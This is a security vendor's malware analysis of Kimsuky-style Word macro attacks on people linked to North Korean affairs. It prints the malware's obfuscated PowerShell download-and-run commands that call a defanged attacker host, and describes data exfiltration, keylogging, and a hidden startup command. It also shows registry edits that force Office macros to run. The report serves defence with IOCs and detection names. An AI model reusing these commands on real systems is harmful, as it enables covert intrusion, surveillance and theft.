The ASEC analysis team has discovered the continuous distribution of malicious Word files targeting specific individuals related to national defense and North Korea. Most of the confirmed Word files had filenames that included the names of individuals related to North Korea. It is likely that this attack is being perpetrated on those related to the field. The filenames of the recently confirmed Word files are as follows:
Date | Filename |
July 18th | (Format Style) Collecting Feedback of Experts on 2022 National Liberation Day Congratulatory Speech in Advance.doc |
July 20th | 0511_Meeting Proceeding of ***, Director of Ministry of Unification.doc |
August 1st | Asan Symposium 2022.doc |
August 3rd | Questionnaire (Researcher Hyeon).doc |
August 4th | Questionnaire (President Ahn).doc |
August 11th | (Plan) Session 6. Gyeonggi-do “Social Conversation for Peace and Unity” Promotion Plan.doc |
August 16th | Questionnaire (Doctor Jeong).doc |
August 17th | Discussion on Security of the Korean Peninsula and Strategy for North Korea (Mr. Kim).doc |
The Word files contain malicious VBA macro codes, which are identical to type B introduced in AhnLab TIP with the title of <Overall Organizational Analysis Report of 2021 Kimsuky Attack Word Files>. The overall operation method is as follows:
The macro code in the most recently discovered file titled Discussion on Security of the Korean Peninsula and Strategy for North Korea (Mr. Kim).doc is shown below.
This macro code is a bit more obfuscated than the one covered in the previous post ‘APT Attack Attempts Using Word Documents to Target Specific Individuals‘. When the macro is run, it downloads additional scripts from ‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’ using PowerShell.
[string]$f={(Nwraew-Objwraect Newrat.WebwraCliwraewrant).Doweilsdjfeng(‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’)};$j=$f.Replace(‘wra’,”);$u=$j.Replace(‘eilsdjfe’,’nloadstri’);$x=iex $u;iex $x |
After this script uses the following commands to collect the user’s PC information, it encodes and saves the data in %APPDATA%AhnalbAhnlab.hwp, eventually sending it to ‘hxxp://vjdif.mypressonline[.]com/ho/post.php’.
Execution Command | Collected Information |
GetFolderPath(“Recent”) | Recent folder path |
dir $env:ProgramFiles | ProgramFiles folder information |
dir “C:Program Files (x86) | C:Program Files (x86) folder information |
systeminfo | System info |
tasklist | List of running processes |
If a registry named AhnlabUpdate exists in HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun, then the script does not collect information and immediately sends the log file. This is likely done to collect the keylogging data as it will use the same filename (Ahnlab.hwp) for log later in future keylogging attempts.
Once the data is sent, the script accesses hxxp://vjdif.mypressonline.com/ho/ng.down to download and run additional encoded scripts.
- Creating shortcut
The additionally downloaded file ng.down is encoded and executed as a PowerShell background process through the Start-Job command. The script performs the following features:
It creates a file named HncSerial.log in the C:windowstemp folder saved with PowerShell commands. It also creates a shortcut for the file in the Startup folder so that the malware can continuously function.
[string]$a = {(New-Object Net.WebClient).Dokarysuntring(‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’)};$b=$a.replace(‘karysun’,’wnloadS’);$c=iex $b;iex $c |
The following PowerShell command is run by the shortcut.
powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText(‘C:windowstempHncSerial.log’);iex $x} |
- Changing Office security settings
The script changes the Office security settings to run the macro at all times by changing the registry values.
New-ItemProperty -Path HKCU:SOFTWAREMicrosoftOffice14.0WordSecurity -Name VBAWarnings -Value 1 New-ItemProperty -Path HKCU:SOFTWAREMicrosoftOffice15.0WordSecurity -Name VBAWarnings -Value 1 New-ItemProperty -Path HKCU:SOFTWAREMicrosoftOffice16.0WordSecurity -Name VBAWarnings -Value 1 New-ItemProperty -Path HKCU:SOFTWAREMicrosoftOffice17.0WordSecurity -Name VBAWarnings -Value 1 New-ItemProperty -Path HKCU:SOFTWAREMicrosoftOffice18.0WordSecurity -Name VBAWarnings -Value 1 New-ItemProperty -Path HKCU:SOFTWAREMicrosoftOffice19.0WordSecurity -Name VBAWarnings -Value 1 |
- Keylogging
User’s key inputs are saved to %APPDATA%AhnalbAhnlab.hwp. When a user starts their PC, the previously created shortcut is run and accesses hxxp://vjdif.mypressonline[.]com/ho/ng.txt to execute the PowerShell commands on that page, ultimately sending the saved information to hxxp://vjdif.mypressonline[.]com/ho/post.php.
As Word files targeting individuals related to North Korea have been consistently discovered, users need to take extra caution. They should refrain from opening email attachments from unknown senders and files from unknown sources. Furthermore, they should ensure to maintain their security settings so that the malicious macros in Word files are not automatically executed.
[File Detection]
Downloader/DOC.Kimsuky
Trojan/PowerShell.FileUpload
[IOC]
cbafe2d6c3b36087220fe63129a1e611 (VBA)
hxxp://vjdif.mypressonline[.]com/ho/ng.txt
hxxp://vjdif.mypressonline[.]com/ho/ng.down
hxxp://vjdif.mypressonline[.]com/ho/post.php
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Source: https://asec.ahnlab.com/en/38182/